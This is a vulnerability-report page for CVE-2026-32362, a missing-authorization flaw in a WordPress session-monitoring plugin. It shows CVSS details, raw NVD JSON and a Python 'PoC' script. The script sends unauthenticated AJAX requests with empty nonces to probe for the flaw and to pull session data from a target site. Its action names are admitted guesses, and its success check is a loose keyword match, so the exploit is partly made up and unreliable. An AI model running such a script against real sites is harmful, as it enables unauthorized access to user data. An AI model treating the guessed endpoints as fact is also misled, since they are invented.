Security Vulnerability Report
中文
CVE-2026-32362 CVSS 5.3 MEDIUM

CVE-2026-32362

Published: 2026-03-13 19:54:50
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in activity-log.com WP Sessions Time Monitoring Full Automatic activitytime allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Sessions Time Monitoring Full Automatic: from n/a through <= 1.1.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Sessions Time Monitoring Full Automatic (activitytime) <= 1.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32362 PoC - WordPress activitytime Plugin Missing Authorization # Author: Security Researcher # Target: WordPress with activitytime plugin <= 1.1.3 import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Note: Replace with actual vulnerable endpoint identified during analysis # Common WordPress AJAX endpoint pattern: AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" def check_vulnerability(): """ Check if the target WordPress site is vulnerable to CVE-2026-32362 by attempting to access protected plugin functionality without authentication. """ # Common vulnerable action patterns for activitytime plugin # These should be identified through actual vulnerability analysis vulnerable_actions = [ "activitytime_get_sessions", "activitytime_export_data", "activitytime_get_user_activity", "activitytime_modify_settings" ] print(f"[*] Testing {TARGET_URL} for CVE-2026-32362") print(f"[*] Target plugin: WP Sessions Time Monitoring Full Automatic") print(f"[*] Affected versions: <= 1.1.3") print("-" * 50) for action in vulnerable_actions: try: # Send unauthenticated request to AJAX endpoint data = { "action": action, "nonce": "" # Intentionally empty to test missing auth check } response = requests.post(AJAX_ENDPOINT, data=data, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: # Analyze response content for signs of successful exploitation response_text = response.text.lower() # Indicators of successful unauthorized access success_indicators = [ "session", "user", "activity", "data", "success", "true", "logged" ] matches = sum(1 for indicator in success_indicators if indicator in response_text) if matches > 2: print(f"[!] VULNERABLE: Action '{action}' accessible without auth") print(f"[!] Response preview: {response.text[:200]}...") return True except requests.RequestException as e: print(f"[-] Error testing action '{action}': {e}") print("[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False def exploit_unauthorized_access(): """ Attempt to exploit the vulnerability to extract sensitive data. This PoC demonstrates the impact of missing authorization. """ # Exploit payload to retrieve session data exploit_data = { "action": "activitytime_get_sessions", "format": "json" } print("\n[*] Attempting to exploit missing authorization...") try: response = requests.post(AJAX_ENDPOINT, data=exploit_data, timeout=10) if response.status_code == 200: print(f"[!] Exploitation successful!") print(f"[!] Retrieved data:") print(response.text) return True except requests.RequestException as e: print(f"[-] Exploitation failed: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] is_vulnerable = check_vulnerability() if is_vulnerable: print("\n[+] Target appears to be vulnerable to CVE-2026-32362") print("[+] Consider running exploit module for further testing") else: print("\n[-] Target may not be vulnerable or requires manual verification") # Note: This PoC is for educational and authorized security testing purposes only. # Always obtain proper authorization before testing any system for vulnerabilities.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32362", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:50.120", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in activity-log.com WP Sessions Time Monitoring Full Automatic activitytime allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Sessions Time Monitoring Full Automatic: from n/a through <= 1.1.3."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en activity-log.com WP Sessions Time Monitoring Full Automatic activitytime permite Explotar Niveles de Seguridad de control de acceso Incorrectamente Configurados. Este problema afecta a WP Sessions Time Monitoring Full Automatic: desde n/a hasta &lt;= 1.1.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/activitytime/vulnerability/wordpress-wp-sessions-time-monitoring-full-automatic-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}